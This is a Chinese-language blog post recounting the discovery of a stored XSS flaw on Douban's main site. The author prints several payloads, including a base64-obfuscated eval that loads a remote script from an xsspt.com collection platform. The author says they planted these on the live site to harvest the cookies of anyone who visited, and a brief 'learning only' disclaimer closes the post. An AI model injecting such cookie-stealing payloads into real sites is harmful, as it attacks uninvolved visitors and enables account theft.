我在機緣巧合下發現豆瓣主站存儲型XSS

0x00 緣起

2/19晚上十點左右,我在這一天”忙碌”的網課生活中解放出來。因爲傍晚挖到聯想的漏洞,想着既然它們在漏洞盒子有項目那麼應該有自己的應急響應平臺吧。

然後我嘗試百度:聯想應急響應

 

 

我一個個的打開,當我打開豆瓣的網站時。怦然心動;是這樣的

 

以我的驚天地泣鬼神的反應力,直接梭哈提交漏洞盒子。

0x0XSS

我開始挖掘這個xss是如何產生的,一個快捷鍵:Ctrl + U打開了前端源代碼查看

因爲xss的彈窗無非就是alert(),confirm()和prompt()

我就本着習慣先去查看了alert

 

很快就找到了罪魁語句:

<img src=\"x\" οnerrοr=\"alert('hello')\">然後我回到前端,查看是哪個用戶插入的語句

開啓我的F12,裝逼功能(當然不是修改頁面哈)

 

 

找到了真正的大佬

0x0XSS

我也滿足一下自己的b格,給自己彈了一個b話十足的句子

於是呢,我就想着去xsspt創建項目,這樣有人打開我就能梭哈一波了。

<img src=" https://xsspt.com/****** " οnerrοr="alert('我是帥哥南方')">

當我插入的時候重新訪問網站時候,平臺並沒有接收到我的cookie

 

我就想着是不是過濾了,於是呢

<img src=x οnerrοr=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwczovL3hzc3B0LmNvbS93UU5qUE4/JytNYXRoLnJhbmRvbSgp'))>

我們可以對自己的payload做些手腳

然後插入,刷新。

 

 

說明:

文章僅用於思路方法學習,請勿用於非法用途

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章